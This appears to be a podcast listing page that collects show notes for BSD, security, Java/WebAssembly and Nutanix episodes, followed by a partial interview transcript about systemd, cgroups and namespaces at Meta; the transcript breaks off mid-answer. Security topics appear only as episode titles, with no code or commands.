Container for a set of identifiers
POPULARITY
Isolating Containers with ZFS and Linux Namespaces, DragonFly BSD 6.4.2, FreeBSD fans rally round zVault upstart, For Upcoming PF Tutorials, We Welcome Your Questions, Using ~/.ssh/authorized keys to decide what the incoming connection can do, PDF bruteforce tool to recover locked files, How and why typical (SaaS) pricing is too high for university departments, and more NOTES This episode of BSDNow is brought to you by Tarsnap (https://www.tarsnap.com/bsdnow) and the BSDNow Patreon (https://www.patreon.com/bsdnow) Headlines Isolating Containers with ZFS and Linux Namespaces (https://klarasystems.com/articles/isolating-containers-with-zfs-and-linux-namespaces/?utm_source=BSD%20Now&utm_medium=Podcast) DragonFly BSD 6.4.2 (https://www.dragonflybsd.org/release64/) FreeBSD fans rally round zVault upstart (https://www.theregister.com/2025/05/12/second_preview_zvault/) News Roundup For Upcoming PF Tutorials, We Welcome Your Questions (https://bsdly.blogspot.com/2025/05/for-upcoming-pf-tutorials-we-welcome.html) Using ~/.ssh/authorized keys to decide what the incoming connection can do (https://dan.langille.org/2025/04/17/using-ssh-authorized-keys-to-decide-what-the-incoming-connection-can-do/) PDF bruteforce tool to recover locked files (https://dataswamp.org/~solene/2025-03-09-test-pdf-passwords.html) How and why typical (SaaS) pricing is too high for university departments (https://utcc.utoronto.ca/~cks/space/blog/tech/UniversityTypicalPricingTooHigh) Tarsnap This weeks episode of BSDNow was sponsored by our friends at Tarsnap, the only secure online backup you can trust your data to. Even paranoids need backups. Feedback/Questions Nils - CFP (https://github.com/BSDNow/bsdnow.tv/blob/master/episodes/612/feedback/nils%20-%20CFP.md) Send questions, comments, show ideas/topics, or stories you want mentioned on the show to feedback@bsdnow.tv (mailto:feedback@bsdnow.tv) Join us and other BSD Fans in our BSD Now Telegram channel (https://t.me/bsdnow)
API hacking and bypassing Ubuntu's user namespace restrictions feature in this week's episode, as well as a bug in CimFS for Windows and revisiting the infamous NSO group WebP bug.Links and vulnerability summaries for this episode are available at: https://dayzerosec.com/podcast/279.html[00:00:00] Introduction[00:00:28] Next.js and the corrupt middleware: the authorizing artifact[00:06:15] Pwning Millions of Smart Weighing Machines with API and Hardware Hacking[00:20:37] oss-sec: Three bypasses of Ubuntu's unprivileged user namespace restrictions[00:32:10] CimFS: Crashing in memory, Finding SYSTEM (Kernel Edition)[00:43:18] Blasting Past Webp[00:47:50] We hacked Google's A.I Gemini and leaked its source code (at least some part)Podcast episodes are available on the usual podcast platforms: -- Apple Podcasts: https://podcasts.apple.com/us/podcast/id1484046063 -- Spotify: https://open.spotify.com/show/4NKCxk8aPEuEFuHsEQ9Tdt -- Google Podcasts: https://www.google.com/podcasts?feed=aHR0cHM6Ly9hbmNob3IuZm0vcy9hMTIxYTI0L3BvZGNhc3QvcnNz -- Other audio platforms can be found at https://anchor.fm/dayzerosecYou can also join our discord: https://discord.gg/daTxTK9
Arnaud et Emmanuel discutent des versions Java, font un résumé de l'ecosystème WebAssembly, discutent du nouveau Model Context Protocol, parlent d'observabilité avec notamment les Wide Events et de pleins d'autres choses encore. Enregistré le 17 janvier 2025 Téléchargement de l'épisode LesCastCodeurs-Episode–321.mp3 ou en vidéo sur YouTube. News Langages java trend par InfoQ https://www.infoq.com/articles/java-trends-report–2024/ Java 17 finalement depasse 11 et 8 ~30/33% Java 21 est à 1.4% commonhaus apparait GraalVM en early majority Spring AI et langchain4j en innovateurs SB 3 voit son adoption augmenter Un bon résumé sur WebAssembly, les différentes specs comme WASM GC, WASI, WIT, etc https://2ality.com/2025/01/webassembly-language-ecosystem.html WebAssembly (Wasm) est un format d'instructions binaires pour une machine virtuelle basée sur une pile, permettant la portabilité et l'efficacité du code. Wasm a évolué à partir d'asm.js, un sous-ensemble de JavaScript qui pouvait fonctionner à des vitesses proches de celles natives. WASI (WebAssembly System Interface) permet à Wasm de fonctionner en dehors des navigateurs Web, fournissant des API pour le système de fichiers, CLI, HTTP, etc. Le modèle de composant WebAssembly permet l'interopérabilité entre les langages Wasm à l'aide de WIT (Wasm Interface Type) et d'ABI canonique. Les composants Wasm se composent d'un module central et d'interfaces WIT pour les importations/exportations, facilitant l'interaction indépendante du langage. Les interfaces WIT décrivent les types et les fonctions, tandis que les mondes WIT définissent les capacités et les besoins d'un composant (importations/exportations). La gestion des packages Wasm est assurée par Warg, un protocole pour les registres de packages Wasm. Une enquête a montré que Rust est le langage Wasm le plus utilisé, suivi de Kotlin et de C++; de nombreux autres langages sont également en train d'émerger. Un algorithme de comptage a taille limitée ne mémoire a été inventé https://www.quantamagazine.org/computer-scientists-invent-an-efficient-new-way-to-count–20240516/ élimine un mot de manière aléatoire mais avec une probabilité connue quand il y a besoin de récupérer de l'espace cela se fait par round et on augmente la probabilité de suppression à chaque round donc au final, ne nombre de mots / la probabilité d'avoir été éliminé donne une mesure approximative mais plutot précise Librairies Les contributions Spring passent du CLA au DCO https://spring.io/blog/2025/01/06/hello-dco-goodbye-cla-simplifying-contributions-to-spring d'abord manuel amis meme automatisé le CLA est une document legal complexe qui peut limiter les contribuitions le DCO vient le Linux je crois et est super simple accord que la licence de la conmtrib est celle du projet accord que le code est public et distribué en perpetuité s'appuie sur les -s de git pour le sign off Ecrire un serveur MCP en Quarkus https://quarkus.io/blog/mcp-server/ MCP est un protocol proposé paor Antropic pour integrer des outils orchestrables par les LLMs MCP est frais et va plus loin que les outils offre la notion de resource (file), de functions (tools), et de proimpts pre-built pour appeler l'outil de la meilleure façon On en reparlera a pres avec les agent dans un article suivant il y a une extension Quarkus pour simplifier le codage un article plus detaillé sur l'integration Quarkus https://quarkus.io/blog/quarkus-langchain4j-mcp/ GreenMail un mini mail server en java https://greenmail-mail-test.github.io/greenmail/#features-api Utile pour les tests d'integration Supporte SMTP, POP3 et IMAP avec TLS/SSL Propose des integrations JUnit, Spring Une mini UI et des APIs REST permettent d'interagir avec le serveur si par exemple vous le partagé dans un container (il n'y a pas d'integration TestContainer existante mais elle n'est pas compliquée à écrire) Infrastructure Docker Bake in a visual way https://dev.to/aurelievache/understanding-docker-part–47-docker-bake–4p05 docker back propose d'utiliser des fichiers de configuration (format HCL) pour lancer ses builds d'images et docker compose en gros voyez ce DSL comme un Makefile très simplifié pour les commandes docker qui souvent peuvent avoir un peu trop de paramètres Datadog continue de s'etendre avec l'acquisition de Quickwit https://www.datadoghq.com/blog/datadog-acquires-quickwit/ Solution open-source de recherche des logs qui peut être déployée on-premise et dans le cloud https://quickwit.io/ Les logs ne quittent plus votre environment ce qui permet de répondre à des besoins de sécurité, privacy et réglementaire Web 33 concepts en javascript https://github.com/leonardomso/33-js-concepts Call Stack, Primitive Types, Value Types and Reference Types, Implicit, Explicit, Nominal, Structuring and Duck Typing, == vs === vs typeof, Function Scope, Block Scope and Lexical Scope, Expression vs Statement, IIFE, Modules and Namespaces, Message Queue and Event Loop, setTimeout, setInterval and requestAnimationFrame, JavaScript Engines, Bitwise Operators, Type Arrays and Array Buffers, DOM and Layout Trees, Factories and Classes, this, call, apply and bind, new, Constructor, instanceof and Instances, Prototype Inheritance and Prototype Chain, Object.create and Object.assign, map, reduce, filter, Pure Functions, Side Effects, State Mutation and Event Propagation, Closures, High Order Functions, Recursion, Collections and Generators, Promises, async/await, Data Structures, Expensive Operation and Big O Notation, Algorithms, Inheritance, Polymorphism and Code Reuse, Design Patterns, Partial Applications, Currying, Compose and Pipe, Clean Code Data et Intelligence Artificielle Phi 4 et les small language models https://techcommunity.microsoft.com/blog/aiplatformblog/introducing-phi–4-microsoft%e2%80%99s-newest-small-language-model-specializing-in-comple/4357090 Phi 4 un SML pour les usages locaux notamment 14B de parametres belle progression de ~20 points sur un score aggregé et qui le rapproche de Llama 3.3 et ses 70B de parametres bon en math (data set synthétique) Comment utiliser Gemini 2.0 Flash Thinking (le modèle de Google qui fait du raisonnement à la sauce chain of thought) en Java avec LangChain4j https://glaforge.dev/posts/2024/12/20/lets-think-with-gemini–2-thinking-mode-and-langchain4j/ Google a sorti Gemini 2.0 Flash, un petit modèle de la famille Gemini the “thinking mode” simule les cheminements de pensée (Chain of thoughts etc) décompose beaucoup plus les taches coplexes en plusiewurs taches un exemple est montré sur le modele se battant avec le probleme Les recommendations d'Antropic sur les systèmes d'agents https://www.anthropic.com/research/building-effective-agents défini les agents et les workflow Ne recommence pas les frameworks (LangChain, Amazon Bedrock AI Agent etc) le fameux débat sur l'abstraction Beaucoup de patterns implementable avec quelques lignes sans frameworks Plusieurs blocks de complexité croissante Augmented LLM (RAG, memory etc): Anthropic dit que les LLMs savent coordonner cela via MCP apr exemple Second: workflow prompt chaining : avec des gates et appelle les LLMs savent coordonner successivement ; favorise la precision vs la latence vu que les taches sont décomposées en plusieurs calls LLMs Workflow routing: classifie une entree et choisie la route a meilleure: separation de responsabilité Workflow : parallelisation: LLM travaillent en paralllele sur une tache et un aggregateur fait la synthèse. Paralleisaiton avec saucissonage de la tache ou voter sur le meilleur réponse Workflow : orchestrator workers: quand les taches ne sont pas bounded ou connues (genre le nombre de fichiers de code à changer) - les sous taches ne sont pas prédéfinies Workflow: evaluator optimizer: nun LLM propose une réponse, un LLM l'évalue et demande une meilleure réponse au besoin Agents: commande ou interaction avec l;humain puis autonome meme si il peut revenir demander des precisions à l'humain. Agents sont souvent des LLM utilisât des outil pour modifier l'environnement et réagir a feedback en boucle Ideal pour les problèmes ouverts et ou le nombre d'étapes n'est pas connu Recommende d'y aller avec une complexité progressive L'IA c'est pas donné https://techcrunch.com/2025/01/05/openai-is-losing-money-on-its-pricey-chatgpt-pro-plan-ceo-sam-altman-says/ OpenAI annonce que même avec des licenses à 200$/mois ils ne couvrent pas leurs couts associés… A quand l'explosion de la bulle IA ? Outillage Ghostty, un nouveau terminal pour Linux et macOS : https://ghostty.org/ Initié par Mitchell Hashimoto (hashicorp) Ghostty est un émulateur de terminal natif pour macOS et Linux. Il est écrit en Swift et utilise AppKit et SwiftUI sur macOS, et en Zig et utilise l'API GTK4 C sur Linux. Il utilise des composants d'interface utilisateur native et des raccourcis clavier et souris standard. Il prend en charge Quick Look, Force Touch et d'autres fonctionnalités spécifiques à macOS. Ghostty essaie de fournir un ensemble riche de fonctionnalités utiles pour un usage quotidien. Comment Pinterest utilise Honeycomb pour améliorer sa CI https://medium.com/pinterest-engineering/how-pinterest-leverages-honeycomb-to-enhance-ci-observability-and-improve-ci-build-stability–15eede563d75 Pinterest utilise Honeycomb pour améliorer l'observabilité de l'intégration continue (CI). Honeycomb permet à Pinterest de visualiser les métriques de build, d'analyser les tendances et de prendre des décisions basées sur les données. Honeycomb aide également Pinterest à identifier les causes potentielles des échecs de build et à rationaliser les tâches d'astreinte. Honeycomb peut également être utilisé pour suivre les métriques de build locales iOS aux côtés des détails de la machine, ce qui aide Pinterest à prioriser les mises à niveau des ordinateurs portables pour les développeurs. Méthodologies Suite à notre épisode sur les différents types de documentation, cet article parle des bonnes pratiques à suivre pour les tutoriels https://refactoringenglish.com/chapters/rules-for-software-tutorials/ Écrivez des tutoriels pour les débutants, en évitant le jargon et la terminologie complexe. Promettez un résultat clair dans le titre et expliquez l'objectif dans l'introduction. Montrez le résultat final tôt pour réduire les ambiguïtés. Rendez les extraits de code copiables et collables, en évitant les invites de shell et les commandes interactives. Utilisez les versions longues des indicateurs de ligne de commande pour plus de clarté. Séparez les valeurs définies par l'utilisateur de la logique réutilisable à l'aide de variables d'environnement ou de constantes nommées. Épargnez au lecteur les tâches inutiles en utilisant des scripts. Laissez les ordinateurs évaluer la logique conditionnelle, pas le lecteur. Maintenez le code en état de fonctionnement tout au long du tutoriel. Enseignez une chose par tutoriel et minimisez les dépendances. Les Wide events, un “nouveau” concept en observabilité https://jeremymorrell.dev/blog/a-practitioners-guide-to-wide-events/ un autre article https://isburmistrov.substack.com/p/all-you-need-is-wide-events-not-metrics L'idée est de logger des evenements (genre JSON log) avec le plus d'infos possible de la machine, la ram, la versiond e l'appli, l'utilisateur, le numero de build qui a produit l'appli, la derniere PR etc etc ca permet de filtrer et grouper by et de voir des correlations visuelles tres rapidement et de zoomer tiens les ventes baisses de 20% tiens en fait ca vient de l'appli andriod tiens aps correle a la version de l'appli mais la version de l'os si! le deuxieme article est facile a lire le premier est un guide d'usage exhaustif du concept Entre argumenter et se donner 5 minutes https://signalvnoise.com/posts/3124-give-it-five-minutes on veut souvent argumenter aka poser des questions en ayant déjà la reponse en soi emotionnellement mais ca amene beaucoup de verbiage donner 5 minutes à l'idée le temps d'y penser avant d'argumenter Loi, société et organisation Des juges fédéraux arrêtent le principe de la neutralité du net https://www.lemonde.fr/pixels/article/2025/01/03/les-etats-unis-reviennent-en-arriere-sur-le-principe-de-la-neutralite-du-net_6479575_4408996.html?lmd_medium=al&lmd_campaign=envoye-par-appli&lmd_creation=ios&lmd_source=default la neutralité du net c'est l'interdiction de traiter un paquet différemment en fonction de son émetteur Par exemple un paquet Netflix qui serait ralenti vs un paquet Amazon Donald trump est contre cette neutralité. À voir les impacts concrets dans un marché moins régulé. Rubrique débutant Un petit article sur les float vs les double en Java https://www.baeldung.com/java-float-vs-double 4 vs 8 bytes precision max de 7 vs 15 echele 10^38 vs 10^308 (ordre de grandeur) perf a peu pret similaire sauf peut etre pour des modeles d'IA qui vont privilegier une taille plus petite parfois attention overflow et les accumulation d'erreurs d'approximation BigDecimal Conférences La liste des conférences provenant de Developers Conferences Agenda/List par Aurélie Vache et contributeurs : 20 janvier 2025 : Elastic{ON} - Paris (France) 22–25 janvier 2025 : SnowCamp 2025 - Grenoble (France) 24–25 janvier 2025 : Agile Games Île-de-France 2025 - Paris (France) 6–7 février 2025 : Touraine Tech - Tours (France) 21 février 2025 : LyonJS 100 - Lyon (France) 28 février 2025 : Paris TS La Conf - Paris (France) 6 mars 2025 : DevCon #24 : 100% IA - Paris (France) 13 mars 2025 : Oracle CloudWorld Tour Paris - Paris (France) 14 mars 2025 : Rust In Paris 2025 - Paris (France) 19–21 mars 2025 : React Paris - Paris (France) 20 mars 2025 : PGDay Paris - Paris (France) 20–21 mars 2025 : Agile Niort - Niort (France) 25 mars 2025 : ParisTestConf - Paris (France) 26–29 mars 2025 : JChateau Unconference 2025 - Cour-Cheverny (France) 27–28 mars 2025 : SymfonyLive Paris 2025 - Paris (France) 28 mars 2025 : DataDays - Lille (France) 28–29 mars 2025 : Agile Games France 2025 - Lille (France) 3 avril 2025 : DotJS - Paris (France) 3 avril 2025 : SoCraTes Rennes 2025 - Rennes (France) 4 avril 2025 : Flutter Connection 2025 - Paris (France) 10–11 avril 2025 : Android Makers - Montrouge (France) 10–12 avril 2025 : Devoxx Greece - Athens (Greece) 16–18 avril 2025 : Devoxx France - Paris (France) 23–25 avril 2025 : MODERN ENDPOINT MANAGEMENT EMEA SUMMIT 2025 - Paris (France) 24 avril 2025 : IA Data Day 2025 - Strasbourg (France) 29–30 avril 2025 : MixIT - Lyon (France) 7–9 mai 2025 : Devoxx UK - London (UK) 15 mai 2025 : Cloud Toulouse - Toulouse (France) 16 mai 2025 : AFUP Day 2025 Lille - Lille (France) 16 mai 2025 : AFUP Day 2025 Lyon - Lyon (France) 16 mai 2025 : AFUP Day 2025 Poitiers - Poitiers (France) 24 mai 2025 : Polycloud - Montpellier (France) 5–6 juin 2025 : AlpesCraft - Grenoble (France) 5–6 juin 2025 : Devquest 2025 - Niort (France) 11–13 juin 2025 : Devoxx Poland - Krakow (Poland) 12–13 juin 2025 : Agile Tour Toulouse - Toulouse (France) 12–13 juin 2025 : DevLille - Lille (France) 17 juin 2025 : Mobilis In Mobile - Nantes (France) 24 juin 2025 : WAX 2025 - Aix-en-Provence (France) 25–27 juin 2025 : BreizhCamp 2025 - Rennes (France) 26–27 juin 2025 : Sunny Tech - Montpellier (France) 1–4 juillet 2025 : Open edX Conference - 2025 - Palaiseau (France) 7–9 juillet 2025 : Riviera DEV 2025 - Sophia Antipolis (France) 18–19 septembre 2025 : API Platform Conference - Lille (France) & Online 2–3 octobre 2025 : Volcamp - Clermont-Ferrand (France) 6–10 octobre 2025 : Devoxx Belgium - Antwerp (Belgium) 9–10 octobre 2025 : Forum PHP 2025 - Marne-la-Vallée (France) 16–17 octobre 2025 : DevFest Nantes - Nantes (France) 4–7 novembre 2025 : NewCrafts 2025 - Paris (France) 6 novembre 2025 : dotAI 2025 - Paris (France) 7 novembre 2025 : BDX I/O - Bordeaux (France) 12–14 novembre 2025 : Devoxx Morocco - Marrakech (Morocco) 23–25 avril 2026 : Devoxx Greece - Athens (Greece) 17 juin 2026 : Devoxx Poland - Krakow (Poland) Nous contacter Pour réagir à cet épisode, venez discuter sur le groupe Google https://groups.google.com/group/lescastcodeurs Contactez-nous via X/twitter https://twitter.com/lescastcodeurs ou Bluesky https://bsky.app/profile/lescastcodeurs.com Faire un crowdcast ou une crowdquestion Soutenez Les Cast Codeurs sur Patreon https://www.patreon.com/LesCastCodeurs Tous les épisodes et toutes les infos sur https://lescastcodeurs.com/
Federation is an exciting and important new feature that was added to Nutanix Objects in the 4.0 release (Spring 2023). It enables a global namespace to be created across multiple Nutanix object stores, even if they are thousands of miles apart in entirely different geographic locations. Buckets hosted by these different object stores then appear to exist within a single object store, offering a consolidated view of the data. https://www.nutanix.dev/2023/07/10/simplifying-access-to-geo-distributed-object-data-using-global-namespaces/Host: Philip Sellers Co-Host: Jirah CoxCo-Host: Ben Rogers
systemd is a service manager for Linux. It is the first process that runs on many Linux distributions and manages all other user processes. It includes utilities for logging, process isolation, process dependencies, socket activation, and many other tasks. psystemd is a python library to communicate with systemd over dbus from python as an alternative to shelling out from an application to control services. Anita Zhang is an engineerd managerd at Meta and Alvaro Levia is a production engineer at Meta. I attended their systemd workshop at the Southern California Linux Expo. Topics covered: What's systemd? Giving talks and workshops cgroups and namespaces systemd timers vs cron Migrating from CentOS 6 to 7 Production engineers need to go lower in the stack to debug applications Meta's Linux userspace team Use of public cloud at Meta Meta's bootcamp Pystemd Mastodon Anita Zhang Alvaro Leiva Workshop systemd workshop Conference talks Journey into the Heart of systemd - Scale 19x Systemd: why you should care as a Python developer - PyCon 2018 Move Fast without Breaking things - Scale 18x Solving All the Problems with systemd - LISA18 Using systemd to high level languages - All Systems Go! The Curious Case of Memory Growth - Scale 19x Related Links systemd psystemd systemd-run systemd-timers Transcript You can help edit this transcript on GitHub. Introductions [00:00:00] Jeremy: So today I'm talking to Avaro Leiva and Anita Zhang. Avaro is the author of the pystemd library and he's a production engineer at Meta. And Anita is an engineerd managerd at Meta, and I'll let her explain that further. [00:00:19] Jeremy: But thank you both for joining me today. [00:00:21] Anita: Yeah, thanks for having us. [00:00:24] Jeremy: I guess where we could start, Anita, maybe you could explain a little bit your, your title that I just gave you there. engineerd managerd [00:00:31] Anita: Yeah, so by default I, I should be a software engineering manager, but when I transitioned to management, I was not, Ready to go public with, um, my transition. So I kind of hid it by, changing the title. we have some weird systems in place that grep on like the word engineer. So I had to keep engineer in there somehow. and so I kind of polled my friends what I should change my title to, and they're like, oh, you're gonna support the systemd team, so you should change it to like managerd. So I was like, sounds good. engineerd, managerd. I didn't wanna get kicked out of any workplace groups, for example, that required me to be an engineer. [00:01:15] Jeremy: Oh, okay. [00:01:17] Anita: Or like engineering function, I guess. [00:01:19] Jeremy: Yeah. Yeah. And you just gotta title it yourself, so as long as you got engineer in it, you're good. [00:01:24] Anita: Yeah, pretty much. Some people have really fun titles like Chief Potato Officer and things like that. [00:01:32] Jeremy: So what groups does the, uh, the potato officer get to go in? [00:01:37] Anita: Yeah. Not the C level ones. (laughs) What's systemd? [00:01:42] Jeremy: I guess maybe to, to start, we should explain to people who aren't familiar, uh, what systemd is. So if either of you wanna wanna take that one. [00:01:52] Alvaro: so people who doesn't know, right? So systemd is today is your init system, right? Is the thing that manage your, your process. and the best way to understand this, it is like when your computer, it needs to execute something. And that's something is what we call pid one. And that pid one is the thing that is gonna manage everything from now from there on, right? Uh, in the most basic level, if you remember how to, how does program start, how does like an idea becomes a program? Uh, you need to fork exec, right? So that means that something has to be at the top of that tree and that is systemd. now that can be anything, right? So there was a time where that was like systemv and there was also like upstart, uh, today's systemd is the thing that, uh, it's shipped in most distributions. [00:02:37] Jeremy: Yeah, because I, I definitely remember when I first started working with Linux, uh, it was with CentOS 6, and when I would want to run a service, I would have to go and write a bash script and kind of have all these checks for, is this thing running? Does it have permission to these things, which user is it running as, and so there was a lot of stuff that I remember having to do before systemd came out. [00:03:08] Alvaro: The good old days as we call them, [00:03:11] Jeremy: Or the bad old days. [00:03:13] Anita: Yeah. Depending on who you ask. [00:03:15] Alvaro: Yeah. So, so that is super interesting because, um, During those time, like you said, you have to write a first script. That means that you were basically yourself, your own service manager, right? So ideas as simple as, is my program running? There was no real answer. You have to figure it out, right? So if you run a program, uh, you maybe would create a pid file which hold the p or the pid of the process, of the main process, right? And then something needs to check, oh, is this file exist? Does the file exist and does the content of this file actually match to a process? And then you grab the process. So it was all these ideas that you had to do, and then for, you have to do it for every single software that you would deploy on your machine, right? That also makes really hard to parallelize stuff, right? Because you have no concept of dependencies. So if your computer has to put, uh, I, I dunno if you remember like long time ago, like Linux machine would, takes like five minutes to boot like your desktop. I remember like openSUSE. I can't remember, like 2008, 2007. Uh, it would take like five minutes to boot and then Ubuntu came and, and it start like immediately. And it was because, you can parallelize things, but you cannot do that if all you're running are bash script. Why was systemd chosen to be included in Linux distributions? [00:04:26] Jeremy: I remember before the Linux distributions didn't include it. And I wonder if you have any insight into how systemd got chosen to be the thing to manage our processes and basically how we got to where we are today. [00:04:44] Anita: I mean, we can kind of speculate a little bit. at the time when Lennart started systemd, um, with. Kai Sievers probably messed up his name there. Um, they were all at Red Hat and Red Hat manages fedora these days and I believe fedoras kind of like the bleeding edge for a lot of the new software ideas. Um, and when they picked up systemd as the defaults, um, eventually it started to trickle down to the rest of their distributions through RHEL and to CentOS and at the same time, I think other distributions started to see how useful it was in terms of managing all the different processes and services. Um, I know Debian at one point had kind of a vote on like whether they should make systemd either default or like, make it easy to switch between both. And then they decided to just stick with systemd because it's, I mean, the public agrees that it's like easy to use and it's more useful. It abstracts away a lot of things that they had to manually do before Who is interested in systemd? Who comes to your talks and workshops? [00:05:43] Jeremy: Something I've been kind of curious about. So just this year at SCaLE uh, you ran a, a workshop teaching people how to use systemd and, and sort of what it is about. I guess when, when you get people coming to these workshops, what are they typically, where are they typically coming from? Are they like system administrators or are they software developers? Like when you run these workshops, who are you looking for as your audience? [00:06:13] Alvaro: To be fair, this was the first time that we actually did a workshop for this. But we have like, talk about this in, in many like conferences. here's what happened, right? So every time that you put systemd on the title of, uh, of a talk, you are like baiting people into coming in, right? Because you do want to hear like some people who are still like reluctant from that war that happened like a few years ago. Between systemd and Ups tart right? most of the people who we get are, I would say like, software engineers, people who do software, and at least the question that I always get a lot, it is like, why should I care about systemd um, if I run everything on my containers in my Docker containers, right? The other type of audience that you get, you do get system administrators. Uh, but in general those people only cares about starting and stopping services don't really care about like the, like the nice other features that systemd has to offer. And then you get people who just wanna start like flame wars and I'm here for them. Why give talks and workshops on systemd? [00:07:13] Jeremy: In previous years, you've given conference talks and, and things like that related to systemd. And I wonder for, for both of you where, where the, the interests came from, where this is something that you feel strongly enough about that you wanna give talks about it. Because it's like, a lot of times when people give a conference talk, it's about, like new front end technology or some, you know, new shiny thing. Whereas systemd is like, it's like very valuable, but it's something that I feel like a lot of people don't think about. And so I'm just kind of curious where the interest came for, for both of you. [00:07:52] Anita: I think I just like giving talks and teaching in general. So if I have work that I found really exciting or interesting, then I'd want to like tell people about it and like teach them and like show them something cool. I think systemd is kind of a really good topic in that case because a lot of people want to learn more about it. Today there's like lots of new developments going on in systemd. So there's like a lot of basic stuff that you can learn, but also a lot of new advanced topics that are changing every year as well. aside from that, there's also like more generally applicable things. Like everyone wants to know how to debug something if you're like a software engineer or developer or even a sysadmin. Um, so last year I did a debugging talk. there's a lot of overlap I'd say how about you Alvaro? [00:08:48] Alvaro: For me, it, my interest in systemd started in, back when I was working on Instagram, we needed to migrate from CentOS6 to CentOS7. and that was the transition where you would have like a random init system to systemd, right? So we needed to migrate all of our scripts from like shell script to whatever shell script is going to interact with systemd. And that's when I was like, I don't like this. So I also have a thing where if I find something that doesn't have an Python API for it, I go and create a Python api. So I, I create pystemd like during that time. And I guess for me, the first reaction was when I was digging up systemd was like, whoa, can systemd do that? Like, like really, like I can like manage, network firewalls, right? Can I, can I stop my service from actually accessing the internet without having to deal with iptables at the time? So that's kind of like the feeling that I wanted to show people when I, when we do these these talks and, and these workshops, right? It's why like most of our talks, eh, have light demos in them because we do want to show people like, Hey, like, this is real. You can use it. [00:09:55] Jeremy: I don't know if this was a conscious decision on your part, but the thing about things like systemd is they, they feel like more foundational things that don't change that quickly. Like if you look at front end development, for example, at at meta you've got React, and that ecosystem changes so often that it's like there's always this new thing, you learn the way to do it and then it changes, right? Whereas I feel like when you're in the Linux user space and you're with systemd, like they're adding new things, but the, the. Foundations kind of stay the same. I'm not sure if that sounds accurate to both of you. [00:10:38] Anita: Yeah, I'd say a lot of the, there are a lot of stable building blocks in systemd, but at Meadow we also have a kernel team, which is working on like new kernel features all the time. They take years possibly to adopt, but with systemd, if we're able to influence the community and like get those kernel features in earlier, then like we can start to really shape what the future of operating systems look like. So it's not, it's very like not short term, uh, work that we're doing. It's a lot of long term, uh, work. [00:11:11] Jeremy: Yeah, that's, that's interesting in that I didn't even think about the fact that you are sitting at the, the user level with systemd, but you kind of know what you want. And so if there's things that the kernel can do to support that, you're having that involvement. With the open source community, make sure that you have your, your say get put in there. Yeah. [00:11:33] Anita: Mm-hmm. [00:11:35] Alvaro: It, it goes both way, right? So one part it is like, yeah, sure, we want features and we create them. Um, and we actually wanted to those to be upstream because we like, one thing that you should, you should never do is manage internal patches for like, things like the kernel, because that's rebase hell. Um, but you also want to be like part of the community and, and, and, and get the benefit of like, being part of it. Who should care about systemd? [00:11:59] Jeremy: And so, like one thing you mentioned ear earlier, Alvaro, is that people will sometimes ask you, I'm running my application in, in Docker containers. Why do I care about systemd? So, so maybe you could explain like, how you would respond to that. Yeah. [00:12:17] Alvaro: Well for more, for most people who actually run their application container I'd say like, no, you probably shouldn't care. Right? Like, you're good where you are. But in general, like, like system is foundational in the sense that it is the first thing that your computer boots your computer doesn't boot off of Docker or Kubernetes or, or any like that. So like something has to run these applications. there's also like a lot of value is that not all applications exist in the vacuum. Like, uh, like let me give you an example. Like if you have a web server, When people are uploading stuff to the web server, you will upload temporary things and then you have to clean it up after a while. So you may want to take advantage of systemd timers or cron or, or whatever you want, right? While the classical container view is that your pid one of the container is the application that you're running, right? So you do want to have like this whole ecosystem, Not all companies can run on containers. not everything can run in containers. So that's basically where all the things start to, to getting into shape. There's a lot of value in understanding how programs actually like exist, right? With the thing that I told you at the beginning of how an idea becomes a program understanding like, like you hit, you are in your bash, right? And you hit ls Star full enter, right? What happened in your machine? Understanding all the things, uh, there is a lot of value and understanding how systemd works. It's, it, it provides, uh, like that knowledge for you. [00:13:39] Jeremy: So for the average engineer at Meta who is relying on your team to deploy their, their code, I guess, if that's the right term, do you think that they're ever needing to think about systemd or is that kind of more like the responsibility of your team and they're just worried about like, I put my thing into my container and I don't, I don't worry about it. [00:14:04] Anita: I think there's like a whole level of the stack that sh ideally we should not even care or know that we're running systemd below them. I think that's, say we're doing our job well, cuz then the abstraction is good enough that they don't have to worry about it. But there's like a whole class of engineers below that that have to, you know, support the systems that run our on bare metal and infrastructure and make it happen. And those are the people who really care about what we're putting in systemd or like what the corner cases are and things like that. [00:14:37] Jeremy: Yeah, that, that makes sense. I mean, one of the talks that was at SCaLE was, uh, Brian Cantrill um, he gave a talk about the forgotten operator, and he was talking about how people forget that there are actual servers behind all the things we're deploying to, right? [00:14:55] Anita: Mm-hmm. [00:14:55] Jeremy: There is a person that you're racking the machines and plugging the power, and like, even though there's all these abstractions in front, that still exists. And so it sounds like things happening at the kernel level and the Linux user space and systemd that's also true because all this infrastructure that people are using to deploy their software on your team is the one who has to keep that running and to keep that running, they need to understand, uh, systemd and, and all these foundational Linux pieces. Yeah. [00:15:27] Anita: Mm-hmm. Yeah. [00:15:29] Alvaro: Like with that said um, I, and maybe it's because I'm very close to to, to the source. Um, and, and you know, like, like I said, like when, when all your tool is a hammer, everything looks like a nail? Well, that hammer for me, a lot of the times it is like even like cgroups or, or namespaces or even like systemd itself, right? there is a lot of times where, um, like for instance, a few years ago we have not, like, like last year or something, uh, we had an application that was very was very hard to load, right? It used a lot of memory. And so we start with, with a model where we would load like a, like a parent process and then child process would deal with, with, um, with the actual work of the thing, the classical model of our server. Now, the thing is that each of the sub process that would run would need to run, uh, on a separate set of privileges, right? So it would really need to run as different users. And that was like very easy to do. But now we actually wanted to some process to run with a, with only view of the file system while the parent process actually doesn't have to do that, right? Uh, or we want to limit the amount of CPU that a child process would use. So like all of these things, we were able like to, to swap it out uh, with using like systemd and, and, uh, like, like a good, Strategy for like, you create a process, you create a new cgroup, you put that into the cgroup, you create the namespace, uh, you add this process into that namespace, and then you have like all this architecture, and it's pretty free because forking it's free in general. [00:17:01] Anita: Actually, Alvaro's comment reminded me of like why we even ended up building the systemd team in the first place. It's kind of like if we have all these teams trying to touch cgroups on their own or like manage processes on their own, they're all gonna do it a different way and not, all of them will be ideal or like, to put it bluntly, I guess, we're really aiming to try and provide like a unified, really good foundational experience, for the layers above us. And so, systemd and the other things that go into the operating system are a step to get there. What are cgroups and namespaces? [00:17:40] Jeremy: And so for someone who's not familiar with the concept of cgroups or of namespaces, could you kind of give like a brief description? [00:17:50] Anita: so namespaces are, uh, we're talking about the kernel feature where, um, there are different ways to isolate, uh, different resources to the process or like, so that they have their own view of certain things, the network or, the processes and things like that. Um, and Cgroup stand for control groups. It's, at meta we only use Cgroups v2 which is a way to organize your processes into, Kind of like a directory view. but processes will be grouped into different, folders, shall you say, but that allows you to, uh, 